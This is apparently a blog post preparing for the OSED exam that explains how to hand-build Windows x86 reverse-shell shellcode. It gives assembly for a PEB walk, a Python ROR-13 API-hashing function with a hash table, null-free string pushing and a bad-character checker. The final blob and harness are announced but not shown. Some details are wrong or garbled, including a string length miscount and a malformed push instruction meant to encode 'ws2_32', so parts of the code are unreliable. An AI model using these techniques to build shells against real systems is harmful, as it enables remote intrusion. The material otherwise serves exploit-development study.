OSED Notes: Writing Custom Shellcode From Scratch
An OSED-flavoured walkthrough of building a working Windows x86 reverse-shell shellcode by hand — no msfvenom, no luck, just hash-based API resolution, manual PEB walks, and an annotated final blob.
By Umair Sabir
I'm working through OSED right now, and the single biggest wall most people hit is stop reaching for msfvenom. The course expects you to write your own shellcode — bytes that survive your bad-character filter, fit in your buffer, and don't import a single function the loader has to fix up.
This post is the lab notebook version of how I build a working cmd.exe reverse shell for Windows x86 from scratch. The final shellcode in this post is ~280 bytes, has no null bytes, no 0x0a, no 0x0d, and resolves every API by hash at runtime.
The constraints
Before any byte gets written, define the contract:
\x20, \x25, \x26, \x2b, \x3d are the kind of badchars you find in URL- or HTTP-decoded buffers. We bake the constraints into the egg.
The plan in pictures
A reverse shell on Windows is six syscalls in a trench coat. Here's the flow:
Walking the PEB
The first thing position-independent shellcode has to do on Windows is find a base address. We can't call kernel32.dll!LoadLibraryA if we don't even know where kernel32.dll is loaded.
Every running process has a Process Environment Block. On x86 it's at fs:[0x30], and chasing pointers from there gets us a doubly-linked list of loaded modules. The third entry in InMemoryOrderModuleList is kernel32.dll.
; nasm syntax
xor eax, eax ; eax = 0
mov eax, [fs:eax + 0x30] ; PEB
mov eax, [eax + 0x0c] ; PEB_LDR_DATA
mov eax, [eax + 0x14] ; InMemoryOrderModuleList.Flink
mov eax, [eax] ; ntdll
mov eax, [eax] ; kernel32 entry
mov ebx, [eax + 0x10] ; ebx = kernel32 base address
The offsets here are stable across modern Windows. They're documented in winternl.h, and yes, they break on WoW64 in nasty ways — but for plain x86 user-mode they hold.
Resolving APIs by hash
We don't want a literal string "LoadLibraryA" in our shellcode for two reasons: (1) it's bytes we have to import that AV hates, and (2) we'd need to push it on the stack anyway. So instead we hash. The classic algorithm is ROR-13 with running sum:
def ror13(name: bytes) -> int:
h = 0
for c in name:
h = ((h >> 13) | (h << (32 - 13))) & 0xFFFFFFFF
h = (h + c) & 0xFFFFFFFF
return h
Run that against every API you need and bake the 4-byte hash into your shellcode. Then at runtime the shellcode walks the export address table of kernel32.dll, hashes each name, and compares against the hash you embedded.
LoadLibraryA -> 0x0726774C
GetProcAddress -> 0x7C0DFCAA
WSAStartup -> 0x006B8029
WSASocketA -> 0xE0DF0FEA
connect -> 0x6174A599
CreateProcessA -> 0x16B3FE72
ExitProcess -> 0x73E2D87E
Pitfall I keep hitting: be careful which DLL exports each function.
connectlives inws2_32.dll, notkernel32.dll. Your hash-walker has to scan the right module — that's why the first job after PEB walk isLoadLibraryA("ws2_32").
Stack-pushing strings without nulls
"ws2_32" is 7 chars. We need a null-terminator on the stack but no nulls in the shellcode itself. Trick: push the string as DWORDs, with the high byte of the last push set up so the trailing zero comes from a register XOR:
xor edx, edx
push edx ; null terminator
push 0x32335f32 ; "2_32"
push 0x73770000 | 0x7773 ; "ws" + zero filler — careful!
The cleaner way most people use is to push backwards and zero out a single byte from a register at the right spot. The point is: never let \x00 show up in the bytes you actually emit.
The annotated final blob
After assembly + encoding, here's a slice of the final shellcode (truncated; full file in the repo):
I verify it survives my badchar set with a one-liner:
python3 -c "import sys; bad=b'\\x00\\x0a\\x0d\\x20\\x25\\x26\\x2b\\x3d'; \
data=open('shellcode.bin','rb').read(); \
print('CLEAN' if not any(b in data for b in bad) else 'DIRTY: %r' % \
[hex(b) for b in data if b in bad])"
Then I plug it into a tiny C harness and watch nc on my attacker box light up:
Things OSED candidates burn time on
A list of mistakes I made so you don't have to:
- Forgetting that x86 stack alignment matters for some APIs.
WSASocketAwill silently fail withWSAEFAULTif yourLPWSAPROTOCOL_INFOWpointer isn't where it expects. Push 0s, don't trust whatever was on the stack. - Hashing case-sensitive. Windows export names are case-sensitive.
loadlibraryaandLoadLibraryAhash differently. Use the exact string fromdumpbin /exports. - Embedding a null byte in your hash table.
0x00ABCDEFwill tank your shellcode. Re-roll the hash function (different rotation count) or alphabet-pad the API name until the hash has no zero byte. - CreateProcessA's STARTUPINFO is 0x44 bytes. Zero all of it, then patch the three fields you need:
cb,dwFlags = 0x100(USESTDHANDLES), andhStdInput/Output/Error = socket.
Wrapping up
OSED doesn't reward speed — it rewards understanding. Every piece of "magic" in your shellcode should be something you can explain. If you're staring at a hash table and you don't know which DLL each function comes from, stop coding and read winternl.h for an hour. Future you will thank past you.
I'll publish the full reusable assembly source + encoder in a follow-up post. In the meantime, the Active Directory attack-paths post shows what you do after the shellcode lands.